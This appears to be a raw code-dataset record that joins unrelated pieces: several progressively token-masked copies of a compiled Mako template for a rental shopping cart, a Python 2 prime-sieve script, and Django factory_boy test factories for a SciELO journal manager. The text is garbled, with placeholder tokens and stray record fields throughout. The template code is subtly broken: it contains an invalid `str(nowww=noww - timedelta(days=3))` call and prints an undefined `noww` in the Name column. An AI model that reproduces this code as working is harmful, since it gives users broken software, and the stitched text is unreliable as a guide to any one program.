__M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(\n '\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n'\n )\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str(item.id))\n __M_writer(\n '\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"'\n )\n __M_writer(str(STATIC_URL))\n __M_writer(str(item.photo.image))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str(noww))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str(item.price_per_day))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n __M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer(\n '</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n'\n )\n if request.user.is_authenticated():\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n else:\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[__name__, name]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[__name__, name]\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(\n '\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n'\n )\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str(item.id))\n __M_writer(\n '\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"'\n )\n __M_writer(str(STATIC_URL))\n __M_writer(str(item.photo.image))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str(noww))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str(item.price_per_day))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n __M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer(\n '</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n'\n )\n if request.user.is_authenticated():\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n else:\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(\n '\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n'\n )\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str(item.id))\n __M_writer(\n '\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"'\n )\n __M_writer(str(STATIC_URL))\n __M_writer(str(item.photo.image))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str(noww))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str(item.price_per_day))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n __M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer(\n '</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n'\n )\n if request.user.is_authenticated():\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n else:\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<function token>\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\n<function token>\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<function token>\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\n<function token>\n<function token>\n<function token>\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<docstring token>\n" ]
false
30
5771f49ad5254588f1683a8d45aa81ce472bb562
def prime_sieve(n): if n==2: return [2] elif n<2: return [] s=range(3,n+1,2) mroot = n ** 0.5 half=(n+1)/2-1 i=0 m=3 while m <= mroot: if s[i]: j=(m*m-3)/2 s[j]=0 while j<half: s[j]=0 j+=m i=i+1 m=2*i+3 return [2]+[x for x in s if x] ps = prime_sieve(1000000) def get_primes_upto(n): i = 0 while ps[i] <= n: i += 1 return ps[0:i+1]; def trial_division(n): if n == 1: return [1] primes = get_primes_upto(int(n**0.5) + 1) prime_factors = [] for p in primes: if p*p > n: break while n % p == 0: prime_factors.append(p) n //= p if n > 1: prime_factors.append(n) return prime_factors def unique_factors(n): return len(set(trial_division(n))) fs = [0] c = 0 for i in range(1,1000000): c+= 1 fs.append(unique_factors(i)) if len(fs) > 4: if fs[-4:] == [4,4,4,4]: print c -3 break
[ "\ndef prime_sieve(n): \n\tif n==2: return [2]\n\telif n<2: return []\n\ts=range(3,n+1,2)\n\tmroot = n ** 0.5\n\thalf=(n+1)/2-1\n\ti=0\n\tm=3\n\twhile m <= mroot:\n\t\tif s[i]:\n\t\t\tj=(m*m-3)/2\n\t\t\ts[j]=0\n\t\t\twhile j<half:\n\t\t\t\ts[j]=0\n\t\t\t\tj+=m\n\t\ti=i+1\n\t\tm=2*i+3\n\treturn [2]+[x for x in s if x]\n\nps = prime_sieve(1000000)\n\ndef get_primes_upto(n):\n i = 0\n while ps[i] <= n:\n i += 1\n return ps[0:i+1];\n\ndef trial_division(n):\n if n == 1: return [1]\n primes = get_primes_upto(int(n**0.5) + 1)\n prime_factors = []\n \n for p in primes:\n if p*p > n: break\n while n % p == 0:\n prime_factors.append(p)\n n //= p\n if n > 1: prime_factors.append(n)\n \n return prime_factors\n\ndef unique_factors(n):\n return len(set(trial_division(n)))\n\nfs = [0]\nc = 0\nfor i in range(1,1000000):\n c+= 1\n fs.append(unique_factors(i))\n if len(fs) > 4:\n if fs[-4:] == [4,4,4,4]:\n print c -3\n break\n\n" ]
true
31
44d87f112ab60a202e4c8d64d7aec6f4f0d10578
# coding: utf-8 import os import factory import datetime from journalmanager import models from django.contrib.auth.models import Group from django.core.files.base import File _HERE = os.path.dirname(os.path.abspath(__file__)) with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file: SAMPLE_XML = xml_file.read() SAMPLE_TIFF_IMAGE = open( os.path.join(_HERE, 'image_test', 'sample_tif_image.tif')) with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file: SAMPLE_XML_RELATED = xml_file.read() class UserFactory(factory.Factory): FACTORY_FOR = models.User @classmethod def _setup_next_sequence(cls): try: return cls._associated_class.objects.values_list( 'id', flat=True).order_by('-id')[0] + 1 except IndexError: return 0 username = factory.Sequence(lambda n: "jmanager_username%s" % n) first_name = factory.Sequence(lambda n: "jmanager_first_name%s" % n) last_name = factory.Sequence(lambda n: "jmanager_last_name%s" % n) email = factory.Sequence(lambda n: "jmanager_email%[email protected]" % n) password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3' is_staff = False is_active = True is_superuser = False last_login = datetime.datetime(2000, 1, 1) date_joined = datetime.datetime(1999, 1, 1) class GroupFactory(factory.Factory): FACTORY_FOR = Group name = factory.Sequence(lambda n: "Group #%s" % n) class SubjectCategoryFactory(factory.Factory): FACTORY_FOR = models.SubjectCategory term = 'Acoustics' class StudyAreaFactory(factory.Factory): FACTORY_FOR = models.StudyArea study_area = 'Health Sciences' class SponsorFactory(factory.Factory): FACTORY_FOR = models.Sponsor name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo' address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \ Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047' email = '[email protected]' complement = '' class UseLicenseFactory(factory.Factory): FACTORY_FOR = models.UseLicense license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n) reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt' disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.' class CollectionFactory(factory.Factory): FACTORY_FOR = models.Collection url = u'http://www.scielo.br/' name = factory.Sequence(lambda n: 'scielo%s' % n) address_number = u'430' country = u'Brasil' address = u'Rua Machado Bittencourt' email = u'[email protected]' name_slug = factory.Sequence(lambda n: 'scl%s' % n) class JournalFactory(factory.Factory): FACTORY_FOR = models.Journal ctrl_vocabulary = u'decs' frequency = u'Q' scielo_issn = u'print' print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n)) eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n)) init_vol = u'1' title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)' title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)' short_title = u'ABCD.(São Paulo)' editorial_standard = u'vancouv' secs_code = u'6633' init_year = u'1986' acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n)) pub_level = u'CT' init_num = u'1', subject_descriptors = u""" MEDICINA CIRURGIA GASTROENTEROLOGIA GASTROENTEROLOGIA""".strip() publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva' publisher_country = u'BR' publisher_state = u'SP' publication_city = u'São Paulo' editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741' editor_email = u'[email protected]' creator = factory.SubFactory(UserFactory) use_license = factory.SubFactory(UseLicenseFactory) class SectionFactory(factory.Factory): FACTORY_FOR = models.Section code = factory.Sequence(lambda n: 'BJCE%s' % n) journal = factory.SubFactory(JournalFactory) class LanguageFactory(factory.Factory): FACTORY_FOR = models.Language iso_code = 'pt' name = 'portuguese' class IssueTitleFactory(factory.Factory): """ ``issue`` must be provided """ FACTORY_FOR = models.IssueTitle language = factory.SubFactory(LanguageFactory) title = u'Bla' class IssueFactory(factory.Factory): FACTORY_FOR = models.Issue total_documents = 16 number = factory.Sequence(lambda n: '%s' % n) volume = factory.Sequence(lambda n: '%s' % n) is_trashed = False publication_start_month = 9 publication_end_month = 11 publication_year = 2012 is_marked_up = False suppl_text = '1' journal = factory.SubFactory(JournalFactory) @classmethod def _prepare(cls, create, **kwargs): section = SectionFactory() issue = super(IssueFactory, cls)._prepare(create, **kwargs) issue.section.add(section) return issue class UserProfileFactory(factory.Factory): FACTORY_FOR = models.UserProfile user = factory.SubFactory(UserFactory) email_notifications = True class SectionTitleFactory(factory.Factory): FACTORY_FOR = models.SectionTitle title = u'Artigos Originais' language = factory.SubFactory(LanguageFactory) section = factory.SubFactory(SectionFactory) class RegularPressReleaseFactory(factory.Factory): FACTORY_FOR = models.RegularPressRelease issue = factory.SubFactory(IssueFactory) doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n) class AheadPressReleaseFactory(factory.Factory): FACTORY_FOR = models.AheadPressRelease journal = factory.SubFactory(JournalFactory) doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n) class PressReleaseTranslationFactory(factory.Factory): FACTORY_FOR = models.PressReleaseTranslation language = factory.SubFactory(LanguageFactory) press_release = factory.SubFactory(RegularPressReleaseFactory) title = u'Yeah, this issue is amazing!' content = u'Want to read more about...' class PressReleaseArticleFactory(factory.Factory): FACTORY_FOR = models.PressReleaseArticle press_release = factory.SubFactory(RegularPressReleaseFactory) article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n) class ArticleFactory(factory.Factory): FACTORY_FOR = models.Article xml = SAMPLE_XML is_aop = False domain_key = factory.Sequence( lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n) journal_title = u'Revista de Saúde Pública' issn_ppub = u'0034-8910' issn_epub = u'1518-8787' xml_version = u'sps-1.2' article_type = u'research-article' doi = u'10.1590/S0034-8910.2014048004965' class ArticleAssetFactory(factory.Factory): FACTORY_FOR = models.ArticleAsset article = factory.SubFactory(ArticleFactory) file = File(SAMPLE_TIFF_IMAGE) owner = u'SciELO' use_license = u'Creative Commons - BY'
[ "# coding: utf-8\nimport os\n\nimport factory\nimport datetime\n\nfrom journalmanager import models\nfrom django.contrib.auth.models import Group\nfrom django.core.files.base import File\n\n\n_HERE = os.path.dirname(os.path.abspath(__file__))\n\n\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:\n SAMPLE_XML = xml_file.read()\n\n\nSAMPLE_TIFF_IMAGE = open(\n os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'))\n\n\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list(\n 'id', flat=True).order_by('-id')[0] + 1\n except IndexError:\n return 0\n\n username = factory.Sequence(lambda n: \"jmanager_username%s\" % n)\n first_name = factory.Sequence(lambda n: \"jmanager_first_name%s\" % n)\n last_name = factory.Sequence(lambda n: \"jmanager_last_name%s\" % n)\n email = factory.Sequence(lambda n: \"jmanager_email%[email protected]\" % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n\n name = factory.Sequence(lambda n: \"Group #%s\" % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \\\n Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\".strip()\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n editor_email = u'[email protected]'\n\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n\n title = u'Artigos Originais'\n\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(\n lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n\n\n", "import os\nimport factory\nimport datetime\nfrom journalmanager import models\nfrom django.contrib.auth.models import Group\nfrom django.core.files.base import File\n_HERE = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')\n ) as xml_file:\n SAMPLE_XML = xml_file.read()\nSAMPLE_TIFF_IMAGE = open(os.path.join(_HERE, 'image_test',\n 'sample_tif_image.tif'))\nwith open(os.path.join(_HERE, 'xml_samples',\n '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%[email protected]' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = 